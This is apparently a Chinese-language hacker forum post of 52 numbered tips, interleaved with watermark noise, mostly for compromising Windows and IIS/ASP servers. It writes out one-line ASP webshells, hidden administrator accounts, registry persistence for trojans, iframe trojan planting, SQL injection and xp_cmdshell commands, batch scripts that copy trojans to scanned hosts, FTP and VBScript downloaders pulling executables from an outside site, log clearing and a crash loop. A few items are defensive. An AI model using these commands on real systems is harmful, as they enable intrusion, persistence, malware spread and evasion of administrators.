1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,- C3 w8 P: v. Y! v& p' a' V' _$ {
cacls C:\windows\system32 /G hqw20:R
' G) s; W+ ^4 p' W思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入- }$ W/ h& @) V3 N& l# l* ^
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
1 f4 g. l! ` h) j$ X7 S) x" y% V( a. X# L2 N3 \
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。! V& B: V" y! _/ d9 ]! t+ ~
/ M" k# Y7 a1 L i! }1 f' r. n3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
5 c4 y4 Q+ c9 |$ k! T, d! h; S
8 v" u' F0 L, s' ~; T9 S, M4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号5 P* }% a1 E6 d' |& y
" W' k* [: K, Z& \8 H7 F: Q1 ?5、利用INF文件来修改注册表
% ^1 G" \- N. p6 S, s* q[Version]
( k( S, Y8 m8 E( b! ]9 T4 @! QSignature="$CHICAGO$"! a) x) B( e- E A/ C3 }, I
[Defaultinstall]9 ^1 X/ c% n" h% o# e
addREG=Ating
) o( t2 i! x9 ^; w# ][Ating]. ^ f) J, O+ b5 N9 R5 S/ f& a
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
; B" f' ]; H6 ~- D8 w7 H以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:3 T0 D, f4 P: d$ }6 \+ m) F
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径9 O% Q1 [( R q; x
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
, c: R9 y i9 n h& fHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
) E" T6 ]5 c4 r$ @3 N" YHKEY_CURRENT_CONFIG 简写为 HKCC
$ k2 ^2 m) Y5 R5 n0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值. F: ~+ k& h. F" u+ S
"1"这里代表是写入或删除注册表键值中的具体数据
% q5 a( F' u j# t9 g) N; z( a
. ?4 B* Q2 r# ~. l" N6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,: h# D' ?3 s0 M6 C& n' i
多了一步就是在防火墙里添加个端口,然后导出其键值& D4 _1 A; O# S9 }7 q- B
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
, s n& Q7 ?% F6 V _4 j
6 U- A8 S0 l6 ]" u7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽: F8 E+ Z3 ?& ^& Z |
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
1 T( a2 G. O+ L8 m ]2 N3 f. a. S9 Z0 V' h) h* T( [) H
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。4 y2 }$ N# x; J& K! ^4 I1 T9 o! v: v
: | _& b' i. I Z$ v
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
& Z5 b: f/ |" C; ~$ h可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
# S. T" h* M5 t( H& R+ Z+ J( _6 M
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
# H) l6 R- r0 `9 ^. a9 C) I# o o( ?/ j8 ] d8 y, f) c& T" I
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
, k7 ^5 p5 V; e& p用法:xsniff –pass –hide –log pass.txt) U1 n O; j8 |* Z3 A) z% V4 ^8 L
' F* w3 g7 W) b& e! ^) e
12、google搜索的艺术
; m7 ]% T( F! b$ X7 Z% S搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
8 ~$ x( q; n! p* W7 D4 L1 E$ M或“字符串的语法错误”可以找到很多sql注入漏洞。: t3 [, i, u9 z4 l+ D! x5 H
4 E7 v" r; T8 X% ]( m( g4 z0 P# n
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。- @& G* V1 \% n* b
, i( ^! Q6 @- d: \3 y2 s14、cmd中输入 nc –vv –l –p 1987& W) Z* f: e' I" { }8 Y
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃+ C$ T& G' J4 n7 R1 E. `
- d7 P: q6 p$ p7 l% n$ U1 T' O5 t15、制作T++木马,先写个ating.hta文件,内容为
2 q8 g! C, d- _6 M<script language="VBScript">: u9 M6 P) k9 [, R
set wshshell=createobject ("wscript.shell" )
, @. J& R' c8 z, q4 P$ Ha=wshshell.run("你马的名称",1)& g( n6 M/ m. k: I
window.close
% _& a/ H7 N7 S, E2 H</script>
0 r, j |, A( B$ ~8 _再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。7 I- y8 K+ Q& e/ i
) I; O9 k3 N n% b3 ~* f
16、搜索栏里输入+ M8 r$ b7 g0 W2 Q4 W9 o. S6 [
关键字%'and 1=1 and '%'='# e7 }# n6 y. v8 i2 F
关键字%'and 1=2 and '%'='4 a* T; }( h. M/ L
比较不同处 可以作为注入的特征字符
: I7 V) D+ O- W6 T/ W. y$ @) B( D
% o# t7 a. U- P6 ]0 l" y2 B17、挂马代码<html>
& F: m+ q, v# O) ^; J<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>6 }, W3 o' b- y6 P) ?
</html>
( ?/ {; y5 L" d- \/ m' }! c# u
" G9 O. P& ~- F, [, [: a18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,, d( ^0 _+ c5 z- b3 N# ]& ?
net localgroup administrators还是可以看出Guest是管理员来。
- q2 x6 z# r2 v) _% K/ C" Z3 D* y* r
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等4 `3 o+ T6 ^# R9 c- L9 V, F: {
用法: 安装: instsrv.exe 服务名称 路径, e& v0 Z0 ^1 t$ G4 O9 y
卸载: instsrv.exe 服务名称 REMOVE' n2 `9 K) C& A. L. g1 W) T
: a( s- ?3 `; X G' C
" {6 }1 e; t+ f% i1 x& g) S' B& x21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
6 {' D3 B4 f$ L3 F0 P不能注入时要第一时间想到%5c暴库。; W& K7 | X( ^# g
1 F5 h- B& ?- K- C0 {6 @
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
' D% G. Y% S" x7 |, ^9 j5 N2 f+ m; b2 N+ S! B. w `$ j5 {
23、缺少xp_cmdshell时
/ q( l H& ]- i尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'4 e: h' i! y3 h
假如恢复不成功,可以尝试直接加用户(针对开3389的): X& S1 `) W, T& h' K' H
declare @o int: Z/ j/ k* B; }) Q5 F" |
exec sp_oacreate 'wscript.shell',@o out
, m N* P7 Q& E0 R) Y4 Kexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
# _) s: H, V& x: T9 a
) p" ]4 }- Z6 R9 z24.批量种植木马.bat; Q& A t$ J# S: \1 }9 l- z8 d! W0 W5 i
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
: u1 m9 a/ e3 }0 C7 |9 J* `/ ~for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间# ]1 J) H1 _1 [4 S. ~. G0 u9 l
扫描地址.txt里每个主机名一行 用\\开头7 A& F1 Q4 f, P$ e" \& J
8 `1 ?' Q5 I6 {' o4 }25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。" C$ @6 n3 c8 F* C' C
9 K) b8 L0 t5 Z* T6 F+ I26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
2 E+ n% t- X! {4 @$ v8 y5 @将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
7 Z1 p" F7 Q8 G }/ \! e/ |.cer 等后缀的文件夹下都可以运行任何后缀的asp木马9 ?/ O: a1 i) J. ?' g1 s
1 _: R' H9 f4 c$ H X. K$ M
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
6 q; l' ] t( S% U" Z1 S% C然后用#clear logg和#clear line vty *删除日志8 c, A, M% l i& `8 Y8 l
5 p) C% j, P8 E28、电脑坏了省去重新安装系统的方法
7 f3 E9 x! Q& |2 N纯dos下执行,
0 Q% h0 g: ~; J3 \# Qxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
" u1 g- O2 V! Y2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
) {& ?! R5 n# }1 ^5 D1 a X9 T, K# t, q8 l( U
29、解决TCP/IP筛选 在注册表里有三处,分别是:
. }6 h# s0 i* L$ qHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip+ E- @/ E% U9 V* t
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip8 _, b" m% c$ F1 Y, P
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip( o9 h( V! T4 u8 Q
分别用
9 R1 n% [/ i/ ~8 B. @& ?regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# j# F1 @/ M1 w* ~5 S: P
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 Q6 W2 a' d1 o# Pregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
1 n' G) y; ^ T( q- H命令来导出注册表项
( W* R+ B5 a$ P" f v# s然后把三个文件里的EnableSecurityFilters"=dword:00000001,
# W4 j" w. l6 n+ _9 p( T4 l9 s改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
2 j+ x& U/ C6 I) Z2 hregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& O- B; ^2 u! ^# O/ }& p9 h
; |3 m+ J8 F( b0 }30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
u6 o( h/ l. dSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
, D* g* V: |! i, P! k, u' s$ _: p* M7 M J# \+ y* e- x: R
31、全手工打造开3389工具" j' J- h$ ^0 }0 E) G
打开记事本,编辑内容如下:
/ a1 f* a. k- b: A1 Wecho [Components] > c:\sql
; R' e a! U1 ]+ r! ]- f6 `) c7 Pecho TSEnable = on >> c:\sql
" Y5 k! ^, ?1 h) b" r' \$ Fsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q" ~1 q. f& k6 \3 u4 I0 S- u
编辑好后存为BAT文件,上传至肉鸡,执行
) ~1 ~7 S9 G; _: S- k' r
! f$ Y1 Z: A1 B( @32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马3 [: v5 u7 H( t+ k0 S
# S& i, @. L/ A! ~! ~
33、让服务器重启
% f' }% E" e. A k% l写个bat死循环:
% ?: q7 O3 s* X8 K# B! b, f@echo off
$ ~2 A" @3 j4 B' H" U1 r:loop1* Y9 O9 f7 l* _2 W1 @) {. S. k
cls
2 Y0 v* o7 [/ ^7 j* ]% x5 Qstart cmd.exe
/ [% \0 h% [: f# U6 bgoto loop1
! y6 \! P6 t' i% k! |, l; g% V |保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启 j1 i" K+ f2 D1 I
( e4 A6 I3 W; u8 `3 u; e) F3 L
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,- K7 q3 y. W/ W" @
@echo off/ o0 T2 p% _& {0 M
date /t >c:/3389.txt
* t n( d' u5 J. stime /t >>c:/3389.txt
9 _8 }9 H" p U$ iattrib +s +h c:/3389.bat0 s! H% J0 `& ]3 y8 e( J( H+ a
attrib +s +h c:/3389.txt
7 p% u* v2 \0 N8 y) h' x onetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt2 q; i0 f1 m& H$ m; ^( J2 g5 N
并保存为3389.bat1 m: [6 x6 c& T5 a
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号% C- [4 t3 B+ F& M
3 [4 D# B; p; D8 J5 D9 l2 I
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
; I: C, k* ?9 I5 S3 c7 gstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)- Y7 C$ Y n* }3 s. ^/ c ?: v; k
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。8 [/ F4 N7 B) Y8 z2 F# _8 c5 A
7 a0 Y: R. Q2 ^; i+ v
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件5 `+ W% k" i9 m$ E, a0 t
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
: W, n1 C% a; T4 R# zecho 你的FTP账号 >>c:\1.bat //输入账号
# B. I6 u) f3 L' N7 q! C" Cecho 你的FTP密码 >>c:\1.bat //输入密码
" [" l0 i! C4 T) f) Lecho bin >>c:\1.bat //登入( e4 F. k9 J$ }0 x! e% X- x* x
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
( f2 w; Z, R+ o8 [: L) k9 Eecho bye >>c:\1.bat //退出
# ~$ |, ~# @# y然后执行ftp -s:c:\1.bat即可
- R9 z- V2 G3 X0 T& |+ E. t- o3 D V) M
37、修改注册表开3389两法
; D$ u- A% R e. i! v(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表. m! Q9 s; n# W
echo Windows Registry Editor Version 5.00 >>3389.reg
5 u: A3 W# E/ x& [echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
* c6 r3 I. K% a: T6 n# l2 hecho "Enabled"="0" >>3389.reg" f$ N; f: [6 f' c+ K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows) H9 r4 b2 {) [5 L
NT\CurrentVersion\Winlogon] >>3389.reg2 k, y9 p. I% m9 M' G
echo "ShutdownWithoutLogon"="0" >>3389.reg
7 q! [, D2 {: q" w$ T2 Xecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
3 ~! m( } y% z1 i, m>>3389.reg+ b3 ?7 {8 k) r+ `8 S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
/ _# |2 ?9 L, D+ k+ j% ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]/ i! e' J a8 D4 H
>>3389.reg" X% y. A& f$ D( u9 ?, S% P
echo "TSEnabled"=dword:00000001 >>3389.reg
7 K% ]; D } ?/ recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg1 p8 k; z3 d% ^. c
echo "Start"=dword:00000002 >>3389.reg1 F5 q0 g0 Q# M' {+ \- ^: S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]5 k9 `+ j- j9 i- |
>>3389.reg& M" j5 o$ y4 b. [4 W
echo "Start"=dword:00000002 >>3389.reg/ M0 Y$ H' [, ?; J. b J
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg' t( V+ ?3 x& {; y( S
echo "Hotkey"="1" >>3389.reg
8 R5 h) @! g8 c4 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- V: p8 Y* K, K
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
6 J0 Z; k1 |# Becho "PortNumber"=dword:00000D3D >>3389.reg
' m' ?- w5 Q4 r/ o! b( F* oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal3 q, T) W4 X0 s$ k; N
Server\WinStations\RDP-Tcp] >>3389.reg
/ V* s8 x5 z9 O* B7 Decho "PortNumber"=dword:00000D3D >>3389.reg
, u. V3 [1 m; _: w( B把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
8 ~2 _; t! w2 h* [% ?, f(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)/ f5 c" \8 f+ q4 V' f
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效9 Y# M1 \3 t2 x, N
(2)winxp和win2003终端开启6 M+ p3 r5 c6 G
用以下ECHO代码写一个REG文件:( I0 T2 Q! X& ^( t- ~$ q
echo Windows Registry Editor Version 5.00>>3389.reg
1 h9 q6 l! X# pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ B/ K- f8 k5 YServer]>>3389.reg
" b2 q3 ~! i# x. i$ Yecho "fDenyTSConnections"=dword:00000000>>3389.reg
8 h, G5 w( O! t2 ?/ B2 }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 {* E8 _9 h3 ~ W/ T2 _. p: YServer\Wds\rdpwd\Tds\tcp]>>3389.reg% [# y, }5 p( a4 g
echo "PortNumber"=dword:00000d3d>>3389.reg
& `: I' @+ |2 qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ [" H/ `# h# c, B
Server\WinStations\RDP-Tcp]>>3389.reg" d% ` G9 ]. P9 }5 J
echo "PortNumber"=dword:00000d3d>>3389.reg$ i8 k5 p' Q' _+ e
然后regedit /s 3389.reg del 3389.reg
" }0 s% c. R/ t# ?XP下不论开终端还是改终端端口都不需重启6 S9 C4 d, B: p) L
9 W% p1 ^* ?% E3 B% o8 c
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
* o0 p* P: O* o, x5 c8 c用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
, k. K( g) w% b# e, s, Y6 j$ b: h5 ]
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
3 ^0 E7 y) j v. J6 y; p(1)数据库文件名应复杂并要有特殊字符& W$ B0 m# p* F: |7 v+ J0 K. g
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
- |2 p* D" \4 B将conn.asp文档中的. l' I% M% l. Q) F
DBPath = Server.MapPath("数据库.mdb")
5 ]. e i& w" q+ O- f% o2 h; D pconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
: m/ z Y, i# O/ M
1 Y/ C# v6 N2 W/ v. j修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置( D& y5 V& m8 |. G) {, b
(3)不放在WEB目录里
0 w0 M2 S9 Z% \) S$ S9 E
# G5 q8 m+ T7 T3 M40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉1 b' |# n/ B, d6 s7 }
可以写两个bat文件* `5 G. `0 Z+ L' W6 \2 ]) \
@echo off
1 x1 X2 N4 o/ Z@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe; d7 o0 j+ \* w4 b4 |7 z9 F1 o; C
@del c:\winnt\system32\query.exe, _. H/ c q) R5 W! R J) y
@del %SYSTEMROOT%\system32\dllcache\query.exe
( `* B9 m* n4 P- Y; q2 c: s9 u) A3 n@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的! V5 s# o8 a" n
1 y* d3 L/ N; D2 ~2 C@echo off3 T% `4 P+ F4 _6 k" h% g7 }
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe' Q7 W. R& I. \9 @; Y% A
@del c:\winnt\system32\tsadmin.exe" j; a6 k" g; y5 n
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
1 p; \% L' E8 Z3 K
% x# ~6 u/ l/ z; D" f+ d% [41、映射对方盘符% ]/ A! Z- V J3 v- a
telnet到他的机器上,
* T; X1 V. h9 Z, H0 Y ]net share 查看有没有默认共享 如果没有,那么就接着运行2 c) }0 e/ v; D, S1 X
net share c$=c:4 H. Y$ I1 b3 l6 C
net share现在有c$7 m- ?0 X$ }/ U3 r" M
在自己的机器上运行) b' \0 K, s4 F4 ]4 O& f
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K) X& M) m0 e0 u
" Q; \4 T, v# X! H/ y
42、一些很有用的老知识2 q/ R7 Y# V0 W& n% Q, y) H
type c:\boot.ini ( 查看系统版本 )
9 u% [! Q2 e; ]( ?6 X( Pnet start (查看已经启动的服务)
& D0 Z0 h) R- z) K0 {% O$ ]query user ( 查看当前终端连接 ); w+ \( m0 u0 S, o4 v9 X g( Y
net user ( 查看当前用户 )
) L4 ?5 F* ~: J) n) anet user 用户 密码/add ( 建立账号 )- g* u5 C) {- c! I6 w: H
net localgroup administrators 用户 /add (提升某用户为管理员)3 Q* Q" m% h0 T& C2 @
ipconfig -all ( 查看IP什么的 )
! p8 A& ]* J2 W+ d9 C% ynetstat -an ( 查看当前网络状态 )% T- a2 b- ^0 t) g u! \# H' E
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
$ T' }/ p. y' u% c. h克隆时Administrator对应1F4
- L o0 ^0 t8 \: t& i9 }4 @guest对应1F5
6 ?/ a* M/ z5 \6 N+ {tsinternetuser对应3E8" N& _! [; a7 |* i1 x
! X7 t, M. i. p2 `1 F; B43、如果对方没开3389,但是装了Remote Administrator Service3 r6 ~5 {0 Z2 ]8 U9 o2 R8 F
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接3 ~& e3 G5 l; K; }0 x1 q: ^
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息7 _) x$ z; i+ l- ]( B, H) J
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin") Q0 L' B% l w$ W1 Y
' i2 ]# P3 Q: ]* R5 H1 p: h: ?# \, F
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
. V1 i$ ^! A( Y! L% N" w本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
! k, i! N W$ J$ }6 {: M! M$ H
: K1 h1 Y& Y& T2 o M" @, p9 r4 k45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
, N3 P9 p% D& h! M& Z% [6 Wecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
4 I( l$ l: z! I$ C8 X R* y^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
`9 Y. o! |) W) k, p# wCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
$ i) {: l4 C% ?: A1 E' g1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs/ G2 Q# T: h& w/ s I
(这是完整的一句话,其中没有换行符)
! u+ i/ ^# p/ N) H% Z- `然后下载:% g1 h/ n6 P5 |1 R; Y* x
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
6 \* D! K$ }5 m3 Q4 I" [* c8 U
; ]1 R! d J$ f$ I0 S46、一句话木马成功依赖于两个条件:
. x+ `& T% P% @1 u+ K8 L- R1、服务端没有禁止adodb.Stream或FSO组件; f8 u* s1 q) ^9 k% x
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。3 B9 k# @) T" r9 P& ]+ ]
. O6 F) }9 b& F6 u47、利用DB_OWNER权限进行手工备份一句话木马的代码:& O6 \2 j$ J' C, p6 h
;alter database utsz set RECOVERY FULL--
' a, p% f% v# O+ v+ Z' O2 P% C;create table cmd (a image)--
7 d7 ?* X4 x$ e) h4 B" {; a9 C;backup log utsz to disk = 'D:\cmd' with init--
" U: M7 N$ W- M9 R;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* k8 X- e8 x5 H;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
' s% e+ ] w: B/ Q& {" E" o注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。4 n9 T" ]* m$ m. H
' N: r" N; E! h9 E! \48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:. q) J0 ^' a/ B2 Q
& c; Q0 i9 X. H) h3 B2 N8 o6 g
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options# V3 o! w5 f$ w; J: M; Z: x
所有会话用 'all'。9 R9 {/ ~( Y7 S0 H; V; ~- M2 P5 I# ]
-s sessionid 列出会话的信息。
- o& r( z& M. t-k sessionid 终止会话。& U- \* ~( ]% ^7 T% F) w+ E- Q, c
-m sessionid 发送消息到会话。
" V5 p7 M* |) ^2 X7 U: F+ W3 a; o& ^- H! P3 [
config 配置 telnet 服务器参数。" Z s k! L5 {* G' C
7 a! M8 t4 P) I1 N. A S7 }9 u+ ycommon_options 为:
, k& i+ k2 F% r8 @- f% n-u user 指定要使用其凭据的用户
2 x7 i8 j/ N* p8 O-p password 用户密码
$ c- O x2 ^3 R/ }0 b& O% h9 B' a1 Y2 r8 \8 q/ a4 w
config_options 为:
z9 ^/ Z7 @. C. jdom = domain 设定用户的默认域
4 r V. j( T4 a1 J! nctrlakeymap = yes|no 设定 ALT 键的映射1 a4 G0 r4 ~5 m, {* {, s) Y' a
timeout = hh:mm:ss 设定空闲会话超时值
: f7 @1 l- V1 @, ptimeoutactive = yes|no 启用空闲会话。
& }0 f1 e8 A/ J0 U6 ]6 X3 Ymaxfail = attempts 设定断开前失败的登录企图数。
; }2 i) F( t7 x K! P/ ^8 M! Fmaxconn = connections 设定最大连接数。' [7 q2 f9 U2 u
port = number 设定 telnet 端口。5 C' e6 ^9 P' W% j6 A8 l% I9 `
sec = [+/-]NTLM [+/-]passwd
& J3 |* ^% ~. L0 c设定身份验证机构/ e4 I. {& d* E9 |
fname = file 指定审计文件名。/ l2 l! V6 E5 N$ o" C( t4 P
fsize = size 指定审计文件的最大尺寸(MB)。# ^/ _! U2 n7 f/ `1 K0 z1 B' _8 e/ ~, N
mode = console|stream 指定操作模式。! Z0 ^9 ~+ W8 Z7 H
auditlocation = eventlog|file|both" p! w2 r& Y* f3 z/ l
指定记录地点
* O8 Y0 _9 i3 S% Q2 o7 l2 b, l+ E$ Oaudit = [+/-]user [+/-]fail [+/-]admin- C* ~6 A5 q% N: o# m
3 M* d0 P# [5 {* ^# T
49、例如:在IE上访问:& f4 m# g, W/ y) |! e5 |1 M
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/" p! P; n+ y7 X, E3 z
hack.txt里面的代码是:2 g1 r6 |. ~3 l
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">: l8 w3 O$ a3 _7 }5 M
把这个hack.txt发到你空间就可以了!$ N) Y6 Q: e \7 M" j
这个可以利用来做网马哦!5 C' ^7 _* u6 U
# w) t4 o# h3 [+ l( a: S6 B* [50、autorun的病毒可以通过手动限制!' r8 z' L9 [; i1 z
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
5 E# s! X' S) X+ u3 ~3 e% Y2,打开盘符用右键打开!切忌双击盘符~
& S. B& v/ X3 D2 [3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!2 @2 D6 N8 Q: W2 w3 I1 D# C* [
8 b- y) d9 u! n1 z' ^51、log备份时的一句话木马:
7 i* |% b$ C( s3 w. x" s) Ja).<%%25Execute(request("go"))%%25>
5 W0 g' [3 q2 S0 ^8 Q0 [3 m6 M+ ` qb).<%Execute(request("go"))%>5 V8 g9 j k7 y6 [- I+ }
c).%><%execute request("go")%><%
& K4 Y/ {* g+ X& o) i7 td).<script language=VBScript runat=server>execute request("sb")</Script>4 }$ I. m2 Q% P; M! N
e).<%25Execute(request("l"))%25>
+ N4 L; }$ ? p( hf).<%if request("cmd")<>"" then execute request("pass")%>. \/ z6 G, p7 h7 L) p2 s- [( N3 ~2 u
! x8 W* R( W8 i52、at "12:17" /interactive cmd
7 Y1 v& a' k- Z4 C' H执行后可以用AT命令查看新加的任务
